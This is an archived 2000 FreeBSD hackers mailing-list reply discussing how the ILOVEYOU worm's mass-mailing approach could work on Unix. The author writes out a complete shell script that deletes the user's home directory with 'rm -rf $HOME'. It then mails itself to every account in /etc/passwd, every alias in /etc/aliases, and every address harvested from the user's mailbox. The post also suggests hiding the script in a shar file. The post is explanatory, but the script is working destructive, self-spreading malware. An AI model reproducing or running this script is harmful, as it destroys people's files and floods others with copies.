From owner-freebsd-hackers  Fri May  5  3:42:58 2000
Delivered-To: freebsd-hackers@freebsd.org
Received: from pandora.alice.net.uk (pandora.alice.net.uk [212.42.0.35])
	by hub.freebsd.org (Postfix) with ESMTP id C4A1837B6BA
	for <hackers@FreeBSD.ORG>; Fri,  5 May 2000 03:42:53 -0700 (PDT)
	(envelope-from aledm@routers.co.uk)
Received: from localhost (localhost [127.0.0.1])
	by pandora.alice.net.uk (8.9.3/8.9.3) with ESMTP id LAA73946;
	Fri, 5 May 2000 11:36:51 +0100 (BST)
	(envelope-from aledm@routers.co.uk)
Date: Fri, 5 May 2000 11:36:51 +0100 (BST)
From: Aled Morris <aledm@routers.co.uk>
X-Sender: aledm@pandora.alice.net.uk
To: Jeremiah Gowdy <jgowdy@home.com>
Cc: Taavi Talvik <taavi@uninet.ee>,
	Matthew Dillon <dillon@apollo.backplane.com>,
	Lloyd Rennie <lloyd@vbc.net>, hackers@FreeBSD.ORG
Subject: Re: ILOVEYOU
In-Reply-To: <002b01bfb5f7$568d17a0$5a5d0418@vista1.sdca.home.com>
Message-ID: <Pine.BSF.4.21.0005051116130.73914-100000@pandora.alice.net.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

On Thu, 4 May 2000, Jeremiah Gowdy wrote:

>lol.  The only way you could really have a virus in freebsd is if it was
>launched or infected as root.  Otherwise the virus would be VERY limited.

I don't agree that it would be limited.  The reason for the "success" of
ILOVEYOU is that its replication is simple.  On a typical PC nowadays
(500MHz I guess) and with a easily accessed "global address list" (company
wide shared address book) you can send out a lot of messages.

My point is that the act of sending out the messages is the worst part of
this "virus".  From a DoS point of view, that's all you need to do.

On a Unix system a similar script could send out messages too, but without
a shared GAL there aren't as many targets:

#!/bin/sh
# this script is called "/tmp/mytext"
# first do damage (in background, this is Unix after all)
rm -rf $HOME &
# now replicate - perhaps we should have three subprocesses here?
for i in `awk -F: '{print $1}' /etc/passwd`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done
# could have used awk...
for i in `grep '^[.a-zA-Z0-9-]*:' /etc/aliases | sed 's/:.*//'`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done
for i in `sed -n 's/^.*[ ,]\([.a-zA-Z0-9-]*@[.a-zA-Z0-9-]*\).*$/\1/p' /var/mail/$USER`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done


Of course the hard job would be to get someone to execute something
containing this script.  Perhaps embedded in a "shar" file? (does anyone
still use shar?)

Aled




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message